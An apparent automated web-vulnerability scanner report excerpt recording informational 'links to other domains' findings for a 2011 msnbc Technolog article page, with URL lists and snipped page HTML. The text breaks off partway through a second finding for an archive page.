Issue detail

The page was loaded from a URL containing a query string:

http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://alex-johnson.newsvine.com/
http://athima-chansanchai.newsvine.com/
http://biggie2221635.newsvine.com/
http://blogs.discovermagazine.com/badastronomy/
http://blogs.discovermagazine.com/cosmicvariance/
http://blogs.discovermagazine.com/loom/
http://blogs.nature.com/news/thegreatbeyond/
http://boyle.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://curmudgeons.blogspot.com/
http://darthdon.newsvine.com/
http://dateline.msnbc.com/
http://davethedoubter.newsvine.com/
http://earthsky.org/
http://eurekalert.org/
http://hardball.msnbc.com/
http://helenaspopkin.newsvine.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://http/www.universetoday.com/
http://ingame.newsvine.com/
http://john875667.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/technolog/style.css?v=23247
http://ljrhodes.newsvine.com/
http://log.newsvine.com/poke.gif?x=0|26&get=c5942663&rand=835004959&do=msnbc.redacted&ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::
http://malexj.tk/6M
http://malexj.wordpress.com/
http://michaelwann.newsvine.com/
http://minotown.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://nasaengineer.com/
http://news.discovery.com/
http://news.sciencemag.org/scienceinsider/
http://nightly.msnbc.com/
http://planetary.org/blog
http://platform.twitter.com/widgets.js
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://redtape.msnbc.com/
http://redtape.newsvine.com/
http://science.slashdot.org/
http://seedmagazine.com/
http://spacefellowship.com/
http://suzanne-choney.newsvine.com/
http://technolog2.newsvine.com/
http://today.msnbc.com/
http://toddkenreck.newsvine.com/
http://trueslant.com/milesobrien/
http://tv.msnbc.com/
http://twitter.com/
http://twitter.com/HelenASPopkin
http://twitter.com/MichaelWann
http://twitter.com/helenaspopkin
http://twitter.com/share
http://twitter.com/windabenedetti
http://twitter.com/wjrothman
http://tyler.newsvine.com/
http://waynej.newsvine.com/
http://wbenedetti.newsvine.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.collectspace.com/
http://www.dailygrail.com/
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/HelenASPopkin
http://www.facebook.com/pages/manage/
http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore
http://www.facebook.com/todd.kenreck
http://www.geekpress.com/
http://www.habitablezone.com/space/
http://www.hobbyspace.com/
http://www.hotmail.com/
http://www.livescience.com/
http://www.nasaspaceflight.com/
http://www.nasawatch.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.outofthecradle.net/
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247
http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://www.popsci.com/
http://www.popularmechanics.com/
http://www.scidev.net/
http://www.scienceblog.com/cms/index.php
http://www.scienceblogs.com/
http://www.sciencenews.org/
http://www.scientificamerican.com/blog/observations/
http://www.signonsandiego.com/news/blogs/science-quest/
http://www.space.com/
http://www.spacedaily.com/
http://www.spacepolitics.com/
http://www.thecaseforpluto.com/
http://www.thecaseforpluto.com/cover.jpg
http://www.thespacereview.com/
http://www.transterrestrial.com/
http://www.twitter.com/MAlexJohnson
http://www.twitter.com/suzannechoney
http://www.unmannedspaceflight.com/
http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://twitter.com/ToddKenreck
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore?GT1=43001
Content-Type: text/html
Cache-Control: max-age=291
Date: Sun, 30 Jan 2011 02:19:32 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - T-Pain's Face
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://technolog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e89cb27add8a8bec4ff014077d76236c84e0ee2e.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/895677dfabd5df38e5ee57c63c4a6f9ac2e2fff9.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5942663&rand=835004959&do=msnbc.redacted&ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5942669" data-contentId="5942669" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942669.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg" width="600" height="672" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Anyhoo … T-Pain really likes Facebook too … at least his latest tattoo indicates such. The Grammy-winning hip-hop artist shared a picture of his new ink on Twitter today, <a href="http://twitter.com/#!/NBTPAIN/status/30855244816584704">with this explanation </a>
...[SNIP]...
<div id="vine-inlinePhoto__5942671" data-contentId="5942671" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:238px;"><img id="helenaspopkin/5942671.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg" width="238" height="320" alt="" />
...[SNIP]...
</param><embed src="http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Follow her on <a href="http://twitter.com/helenaspopkin"><span>
...[SNIP]...
</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><span>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" data-Text="T-Pain's Facebook tattoo so hardcore, it's hexacore!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div class="normal"><a href="http://biggie2221635.newsvine.com/">biggie-2221635</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="newsvine"><a href="http://tyler.newsvine.com/">tyler</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://waynej.newsvine.com/">waynejohn</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MInOTown.newsvine.com/">M In O Town</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ljrhodes.newsvine.com/">L.J. Rhodes</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://John875667.newsvine.com/">John-875667</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://michaelwann.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/MichaelWann">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://technolog2.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg" width="60" height="60" /></a>
...[SNIP]...
from Time and the NYT to the notorious tech blog Gizmodo, where he was features editor for three years. He is not an Apple fanboy, but sometimes he is mistaken for one. You can stalk him on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/wjrothman">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://helenaspopkin.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/HelenASPopkin">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/HelenASPopkin">Become a fan on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://suzanne-choney.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://www.twitter.com/suzannechoney">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://alex-johnson.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://malexj.wordpress.com/">Editor at Large</a>
...[SNIP]...
<li class="follow on twitter"><a href="http://www.twitter.com/MAlexJohnson">Follow on Twitter</a>
...[SNIP]...
<li class="follow on facebook"><a href="http://malexj.tk/6M">Follow on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://redtape.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://wbenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://athima-chansanchai.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.346. http://technolog.msnbc.redacted/_nv/more/section/archive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_nv/more/section/archive

Issue detail

The page was loaded from a URL containing a query string:

http://technolog.msnbc.redacted/_nv/more/section/archive?date=2011/1

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://alex-johnson.newsvine.com/
http://athima-chansanchai.newsvine.com/
http://bit.ly/caLhBE
http://blekko.com/
http://blog.facebook.com/blog.php?post=436800707130
http://blog.facebook.com/blog.php?post=486790652130
http://blog.stephenwolfram.com/2011/01/jeopardy-ibm-and-wolframalpha/
http://blog.us.playstation.com/2011/01/26/live-from-japan-playstation-meeting-2011/
http://blogs.cfr.org/cook/
http://blogs.discovermagazine.com/badastronomy/
http://blogs.discovermagazine.com/cosmicvariance/
http://blogs.discovermagazine.com/loom/
http://blogs.nature.com/news/thegreatbeyond/
http://boyle.newsvine.com/
http://consumerist.com/2011/01/virgin-mobile-adding-5gb-cap-and-throttle-21511.html
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://curmudgeons.blogspot.com/
http://dataprivacyday2010.org/about/
http://dateline.msnbc.com/
http://digitaldaily.allthingsd.com/20110128/90-percent-of-att-iphone-subs-still-under-contract/?mod=twitter&utm_source=twitterfeed&utm_medium=twitter
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://earthsky.org/
http://en.wikipedia.org/wiki/List_of_animals_with_fraudulent_diplomas
http://en.wikipedia.org/wiki/Main_Page
http://english.aljazeera.net/
http://english.aljazeera.net/news/middleeast/2011/01/201112523026521335.html
http://eurekalert.org/
http://feeds.gawker.com/~r/lifehacker/full/~3/VbASl0_jzW8/amazon-security-flaw-may-make-your-old-password-easy-to-crack
http://gizmodo.com/5745108/how-a-cat-named-zoe-earned-several-advanced-degrees-and-became-a-psychotherapist
http://gizmodo.com/5745478/is-internet-access-a-human-right
http://globalvoicesonline.org/specialcoverage/egypt-protests-2011/
http://hardball.msnbc.com/
http://helenaspopkin.newsvine.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://http/www.universetoday.com/
http://ingame.newsvine.com/
http://kotaku.com/5744297/live+blogging-sonys-psp2-press-event
http://kotaku.com/5744563/lets-see-how-big-this-psp2-really-is
http://kotaku.com/5744571/metal-gear-solid-4-lost-planet-yakuza-shown-playable-on-psp2
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
